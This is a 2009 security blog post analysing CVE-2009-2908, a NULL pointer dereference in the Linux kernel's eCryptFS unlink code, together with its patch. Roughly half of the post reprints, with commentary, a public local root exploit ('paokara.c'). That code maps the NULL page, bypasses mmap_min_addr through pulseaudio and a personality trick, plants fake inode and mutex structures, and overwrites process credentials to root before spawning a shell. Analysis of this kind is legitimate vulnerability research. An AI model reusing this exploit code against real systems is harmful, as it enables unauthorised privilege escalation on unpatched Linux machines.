CVE-2009-2908: Linux kernel eCryptFS NULL Pointer Dereference

This vulnerability was reported by Tyler Hicks and it affects Linux kernel 2.6.31 and probably earlier releases as well. Let’s have a quick look at how eCryptFS’s unlink() is performed…

static int ecryptfs_unlink(struct inode *dir, struct dentry *dentry)
{
        int rc = 0;
        struct dentry *lower_dentry = ecryptfs_dentry_to_lower(dentry);
        struct inode *lower_dir_inode = ecryptfs_inode_to_lower(dir);
        struct dentry *lower_dir_dentry;

        lower_dir_dentry = lock_parent(lower_dentry);
        rc = vfs_unlink(lower_dir_inode, lower_dentry);
     ...
}

This code resides in fs/ecryptfs/inode.c and the above snippet was taken from 2.6.31 release of the Linux kernel. As you can see, it retrieves the lower dentry using ecryptfs_dentry_to_lower() and subsequently it locks the parent using lock_parent() and it then calls the VFS layer routine vfs_unlink() to perform the actual unlinking.
The latter function can be found at fs/namei.c and among others it will execute this:

int vfs_unlink(struct inode *dir, struct dentry *dentry)
{
        int error = may_delete(dir, dentry, 0);
     ...
        /* We don't d_delete() NFS sillyrenamed files--they still exist. */
        if (!error && !(dentry->d_flags & DCACHE_NFSFS_RENAMED)) {
                fsnotify_link_count(dentry->d_inode);
                d_delete(dentry);
        }

        return error;
}

So, unless the dentry’s flags include DCACHE_NFSFS_RENAMED which as we can read from include/linux/dcache.h is simply:

#define DCACHE_NFSFS_RENAMED  0x0002    /* this dentry has been "silly
                                         * renamed" and has to be
                                         * deleted on the last dput()
                                         */

it will call fsnotify_link_count() from include/linux/fsnotify.h to issue a notify that the inode’s link count described by an atomic_t variable named ‘d_count’ is changed. Finally, d_delete() from fs/dcache.c is invoked and this will execute this code:

/**
 * d_delete - delete a dentry
 * @dentry: The dentry to delete
 *
 * Turn the dentry into a negative dentry if possible, otherwise
 * remove it from the hash queues so it can be deleted later
 */
 
void d_delete(struct dentry * dentry)
{
        int isdir = 0;
     ...
        if (atomic_read(&dentry->d_count) == 1) {
                dentry_iput(dentry);
                fsnotify_nameremove(dentry, isdir);
                return;
        }
     ...
}

It will perform an atomic read of the link counter of the requested dentry and if this is equal to one, it will call dentry_iput() to release the dentry’s inode by setting it to NULL like this:

static void dentry_iput(struct dentry * dentry)
        __releases(dentry->d_lock)
        __releases(dcache_lock)
{
        struct inode *inode = dentry->d_inode;
        if (inode) {
                dentry->d_inode = NULL;
     ...
}

The final call to fsnotify_nameremove() will just issue another notification that the filename was removed from the directory. The problem with the above call to vfs_unlink() from ecryptfs_unlink() was that there was no locking involved. This means that even though the VFS layer would have decremented the ‘d_count’ and set the ‘d_inode’ to NULL, a user could use some read() or write() to access that inode leading to a NULL pointer dereference. For example, here is some code from ecryptfs_read_update_atime() routine:

/**
 * ecryptfs_read_update_atime
 *
 * generic_file_read updates the atime of upper layer inode.  But, it
 * doesn't give us a chance to update the atime of the lower layer
 * inode.  This function is a wrapper to generic_file_read.  It
 * updates the atime of the lower level inode if generic_file_read
 * returns without any errors. This is to be used only for file reads.
 * The function to be used for directory reads is ecryptfs_read.
 */
static ssize_t ecryptfs_read_update_atime(struct kiocb *iocb,
                                const struct iovec *iov,
                                unsigned long nr_segs, loff_t pos)
{
        int rc;
        struct dentry *lower_dentry;
     ...
                lower_dentry = ecryptfs_dentry_to_lower(file->f_path.dentry);
                lower_vfsmount = ecryptfs_dentry_to_lower_mnt(file->f_path.dentry);
                touch_atime(lower_vfsmount, lower_dentry);
     ...
}

Here, it retrieves the lower dentry and then uses it in touch_atime(). If we move to that routine we’ll see what will happen in case of NULL ‘d_inode’ because of the previous unchecked call to vfs_unlink()…

void touch_atime(struct vfsmount *mnt, struct dentry *dentry)
{
        struct inode *inode = dentry->d_inode;
        struct timespec now;
     ...
        if (inode->i_flags & S_NOATIME)
     ...
        if (IS_NOATIME(inode))
     ...
        if ((inode->i_sb->s_flags & MS_NODIRATIME) && S_ISDIR(inode->i_mode))
     ...
        if ((mnt->mnt_flags & MNT_NODIRATIME) && S_ISDIR(inode->i_mode))
     ...
        now = current_fs_time(inode->i_sb);
     ...
        inode->i_atime = now;
}
EXPORT_SYMBOL(touch_atime);

So, multiple NULL pointer dereferences arise since ‘dentry->d_inode’ could be NULL. Similar scenario also appears when calling ecryptfs_getxattr() which as we can read from fs/ecryptfs/inode.c is just a wrapper around ecryptfs_getxattr_lower() like this:

ecryptfs_getxattr(struct dentry *dentry, const char *name, void *value,
                  size_t size)
{
        return ecryptfs_getxattr_lower(ecryptfs_dentry_to_lower(dentry), name,
                                       value, size);
}

Here we can find something really handy regarding the exploitation of that vulnerability… Since ecryptfs_getxattr() will access the lower dentry, meaning the one that might contain a NULL ‘d_inode’, it would result in some interesting behavior in case of this code path…

ssize_t
ecryptfs_getxattr_lower(struct dentry *lower_dentry, const char *name,
    
     ...
        if (!lower_dentry->d_inode->i_op->getxattr) {
     ...
        mutex_lock(&lower_dentry->d_inode->i_mutex);
        rc = lower_dentry->d_inode->i_op->getxattr(lower_dentry, name, value,
                                                   size);
        mutex_unlock(&lower_dentry->d_inode->i_mutex);
     ...
}

So, if ‘lower_dentry->d_inode->i_op->getxattr’ function pointer is not NULL, which it would definitely not going to be, it will lock the “NULL->i_mutex” lock and then call the callback routine located at “NULL->i_op->getxattr” leading to quite simple code execution if you have mapped some function pointer there.
Anyway, this was patched by updating the ecryptfs_unlink() to use dget() before retrieving the lower dentry like this:

        struct dentry *lower_dir_dentry;
 
+       dget(lower_dentry);
        lower_dir_dentry = lock_parent(lower_dentry);

And in its ‘out_unblock’ label dput() to release the lock like this:

 out_unlock:
        unlock_dir(lower_dir_dentry);
+       dput(lower_dentry);
        return rc;
 }

Those two functions can be found at include/linux/dcache.h and fs/dcache.c respectively and they simply use atomic operations to handle the dentry’s link counter increment and release respectively.
Now, to the exploitation. Recently, a Greek guy (named Fotis Loukos – fotisl) released an exploit code for this vulnerability. I have to admit that I’m sad to see Greek people doing such stuff but of course, it’s his life.
So, let’s have a look at how he exploits this bug…

 * The final memory map is the following
 *
 * |              |
 * |              |
 * |     0x9c     | d_inode->i_op = 0x0, see location 0x44
 * |              |
 * |              |
 * |     0x78     | d_inode->i_mutex = 0x10 where we created our mutex
 * |              |
 * |              |
 * |     0x44     | d_inode->i_op->getxattr will point to the code
 * |              |
 * |              |
 * |     0x20     | mutex->owner
 * |              |
 * |              |
 * |     0x10     | mutex for the mutex_lock call
 * |              |
 * |              |
 * |-----NULL-----|
 *
 */

His aim is to utilize the codepath I described through getxattr() callback. This means that he’ll have to create a structure similar to the one he gave in the initial comments in the first page of the virtual address space. Now, to the actual code…

/*
 * It works from pulseaudio
 */
int pa__init(void *m)
{
    char *path = getenv("XPL_PATH");

    if(path == NULL) {
        printf("Error: XPL_PATH env variable doesn't contain a path.\n");
        exit(1);
    }

    runexploit(path);
}

void pa__done(void *m)
{
}

/*
 * And as standalone
 */
int main(int argc, char **argv)
{
    if(argc != 2) {
        printf("Usage: %s <path>\n", argv[0]);
        exit(1);
    }

    frommain = 1;
    runexploit(argv[1]);
}

As you can see, he uses “pa__init()” which means that you can use it as a pulseaudio library to bypass the MMAP_MIN_ADDR restriction. However, he also provides the ability to execute it as a standalone application directly from main() routine. In either case, runexploit() is executed, so let’s have a look at it…

#define INODE_MUTEX_OFF         0x78
#define INODE_IOP_OFF           0x9c
#define INODEOPS_GETXATTR_OFF   0x44

#define TASK_RUNNING 0

struct list_head {
    struct list_head *next, *prev;
};

struct mymutex {
    int count;
    unsigned int wait_lock;
    struct list_head wait_list;
    /* No, I won't define a thread_info struct here */
    void *owner;
};
    ...
/*
 * We run it here so it works both when run from command line and using
 * pulseaudio.
 */
int runexploit(char *path)
{
    struct mymutex *mutex;

    /* The personality trick */
    if(personality(0xffffffff) == PER_SVR4) {
        if(mprotect(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC) == -1) {
            perror("mprotect");
            exit(1);
        }
    } else if(mmap(0x0, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED |
                MAP_ANONYMOUS | MAP_PRIVATE, 0, 0) == MAP_FAILED) {
        perror("mmap");
        exit(1);
    }

    uid = getuid();
    gid = getgid();

    /* Set up everything here */
    *(unsigned long *) INODE_IOP_OFF = 0x0;
    *(unsigned long *) INODE_MUTEX_OFF = 0x10;
    *(unsigned long *) INODEOPS_GETXATTR_OFF = (unsigned long) getroot;

    mutex = (struct mymutex *) 0x10;
    mutex->count = 0;
    mutex->wait_lock = 0;
    mutex->wait_list.prev = &mutex->wait_list;
    mutex->wait_list.next = &mutex->wait_list;
    mutex->owner = (void *) 0x20;

    trigger(path);

    execl("/bin/sh", "sh", NULL);
}

He retrieves the current personality and if it equals the SystemV Release 4 one (the pulseaudio bypass trick), it will change the NULL page’s permissions to readable/writable/executable using mprotect(2). Otherwise, he uses mmap(2) to attempt to map it. It is important to note here that he always uses ‘0x1000’ as the page size which it isn’t really portable in my opinion. Dynamically retrieving the page size through getpagesize(2) would be much better.
After getting the NULL page, variables ‘uid’ and ‘gid’ are updated with the current ones and malicious structure is constructed using the direct values ‘INODE_IOP_OFF’, ‘INODE_MUTEX_OFF’ and ‘INODEOPS_GETXATTR_OFF’. This is also a bad practise since those offsets might not work under 64-bit systems. A better solution would be to create a dummy structure from the original dentry structure from include/linux/dcache.h and use this to calculate the offsets dynamically on compile time.
After creating the malicious structure, he initializes his mutex structure (in which by the way, he is doing a more dynamic calculation of the offsets) by setting its address to 0x10, its owner to the address 0x20 and its locks appropriately.
At last, since the NULL is ready to trick the kernel into believing that it contains a valid dentry, it calls trigger()…

/*
 * Go go go!
 */
void trigger(char *path)
{
    char buf1[128], buf2[128];
    int fd;

    snprintf(buf1, 128, "%s/lala", path);
    snprintf(buf2, 128, "%s/koko", path);

    if(open(buf1, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600) < 0)
        return;
    link(buf1, buf2);
    unlink(buf1);
    if((fd = open(buf2, O_RDWR | O_CREAT | O_NOFOLLOW, 0600)) < 0)
        return;
    unlink(buf2);
    write(fd, "kot!", 4);
}

This code is similar to the trigger strace output provided by Tyler Hicks. He creates two files using open(2), then uses link(2) to create a hardlink from ‘buf1’ to ‘buf2’ to keep the inode that will be dereferenced. Unlink the ‘buf1’ to cause the vfs_unlink() call in ecryptfs_unlink() and then attempt to open(2) the ‘buf2’ hardlink that will have a ‘dentry->d_inode’ pointing to NULL. Finally, to force the kernel into accessing that inode he uses a dummy write(2) call.
For completeness, here are the rest routines from ‘paokara.c’ exploit code…

/*
 * Since ecryptfs appeared in 2.6.19 there is no need to support 2.4 stuff,
 * such as the task_struct being at the end of the kernel stack.
 */
static inline unsigned long get_current()
{
    unsigned long current;

    /* We begin by checking for a 4k stack */
    current = (unsigned long) &current;
    current = *(unsigned long *)(current & ~(0x1000 - 1));
    stacksize = 0x1000;

    if((current >= 0xc0000000) && (*(unsigned long *)current == TASK_RUNNING))
        return current;

    /* It's probably 8k */
    current = (unsigned long) &current;
    current = *(unsigned long *)(current & ~(0x2000 - 1));
    stacksize = 0x2000;

    if((current >= 0xc0000000) && (*(unsigned long *)current == TASK_RUNNING))
        return current;

    /* It's... shit */
    return 0;
}

This is a simple code that retrieves the current process’ ‘task_struct’ which works for both 4KB and 8KB stacks. And the getroot() function is…

/*
 * This will be run by the kernel.
 */
static ssize_t getroot()
{
    unsigned long *current, *real_cred, *cred;
    int i, j;

    if(!(current = (unsigned long *) get_current()))
        return 0;

    /* The following should work till 2.6.28.10 since 2.6.29 uses COW */
    for(i = 0; i < stacksize; i++) {
        if((current[0] == uid) && (current[1] == uid) &&
                (current[2] == uid) && (current[3] == uid) &&
                (current[4] == gid) && (current[5] == gid) &&
                (current[6] == gid) && (current[7] == gid)) {
            current[0] = current[1] = current[2] = current[3] = 0;
            current[4] = current[5] = current[6] = current[7] = 0;
            return 0;
        }
        current++;
    }

    current = (unsigned long *) get_current();

    /* COW creds on  kernel ver >= 2.6.29 */
    real_cred = cred = NULL;
    for(i = 0; i < stacksize - 16; i++) {
        if(((frommain == 1) && (!memcmp((char *) current, "paokara", 7))) ||
                ((frommain == 0) && (!memcmp((char *) current,
                "pulseaudio", 10)))) {
            /*
             * Found comm, we must go back, search for the mutex and then
             * back again for the cred structs.
             */
            for(j = 0; j < stacksize - i - 12; j++) {
                if(*(unsigned int *)current == 1) {
                    real_cred = *((unsigned long **) current - 3);
                    cred = *((unsigned long **) current - 2);
                    break;
                }
                current--;
            }
            break;
        }
        current++;
    }

    if(real_cred) {
        /* Skip counter */
        real_cred++;
        cred++;

        if((real_cred[0] == uid) && (real_cred[1] == gid) &&
                (real_cred[2] == uid) && (real_cred[3] == gid) &&
                (real_cred[4] == uid) && (real_cred[5] == gid) &&
                (real_cred[6] == uid) && (real_cred[7] == gid)) {
            real_cred[0] = real_cred[1] = real_cred[2] = real_cred[3] = 0;
            real_cred[4] = real_cred[5] = real_cred[6] = real_cred[7] = 0;
        }

        if((cred[0] == uid) && (cred[1] == gid) &&
                (cred[2] == uid) && (cred[3] == gid) &&
                (cred[4] == uid) && (cred[5] == gid) &&
                (cred[6] == uid) && (cred[7] == gid)) {
            cred[0] = cred[1] = cred[2] = cred[3] = 0;
            cred[4] = cred[5] = cred[6] = cred[7] = 0;
        }
    }

    return 0;
}

He uses get_current() to get the current ‘task_struct’ and then he iterates in the structure to find the credentials and update them to that of root. He also included code for newer credential records. Back to runexploit() the last system call to be executed will spawn a shell, hopefully with the privileges of the overwritten credential record.

Written by xorl

October 18, 2009 at 17:19

Posted in linux, vulnerabilities

One Response

Subscribe to comments with RSS.

Good to see you back.

W.

October 20, 2009 at 20:17

xorl %eax, %eax